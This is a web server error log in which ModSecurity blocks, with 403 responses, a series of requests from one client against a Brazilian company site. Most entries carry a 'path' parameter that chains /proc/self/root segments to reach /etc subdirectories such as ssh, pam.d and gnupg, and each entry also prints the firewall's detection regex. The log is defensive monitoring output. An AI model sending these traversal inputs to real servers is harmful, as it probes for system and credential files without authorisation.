[Tue Mar 17 14:48:02.409169 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:59244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT0tY0UrI5A3LftIz_wAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:12.125802 2026] [proxy_fcgi:error] [pid 9299:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:48:13.477883 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:33240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT3fPqhzTj3BvfDX-LkgAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:15.184157 2026] [:error] [pid 7004:tid 140411666392832] [client 74.7.241.31:33256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT3sU6Sx0TG1YjmQiyfgAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:17.171854 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.241.31:33264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT4at8Nd0UC_OcbVHOjwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:18.454939 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.241.31:45778] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT4qBJNF7axNlVR0UbuQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:19.816844 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.241.31:45792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT46t8Nd0UC_OcbVHOkgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:21.140476 2026] [:error] [pid 7004:tid 140411649607424] [client 74.7.241.31:45800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT5cU6Sx0TG1YjmQiygQAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:25.031259 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.241.31:45816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT6at8Nd0UC_OcbVHOmwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:26.780767 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.31:45830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT6qBJNF7axNlVR0UbwAAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:28.330120 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:35770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT7Bj0p0SRWAqcjGF9SQAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:29.791276 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.241.31:35774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT7at8Nd0UC_OcbVHOnQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:31.288398 2026] [:error] [pid 9299:tid 140411641214720] [client 74.7.241.31:35780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT77-sgTmmJoPuMdy54wAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:32.704053 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:35788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT8HIk7brgkOH-rIWPBQAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:34.121816 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59088] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:48:34.151404 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.241.31:35800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT8r-sgTmmJoPuMdy55gAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:34.351544 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.241.31:35800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT8r-sgTmmJoPuMdy55wAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:35.642481 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:35814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT8_PqhzTj3BvfDX-LnQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:37.093864 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.31:35826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT9aBJNF7axNlVR0UbyAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:38.626123 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:59822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT9sU6Sx0TG1YjmQiyigAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:40.075701 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:59826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT-NY0UrI5A3LftIz_3QAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:41.559251 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:59842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT-Rj0p0SRWAqcjGF9UwAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:48:43.053486 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:59846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmT-8U6Sx0TG1YjmQiyiwAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
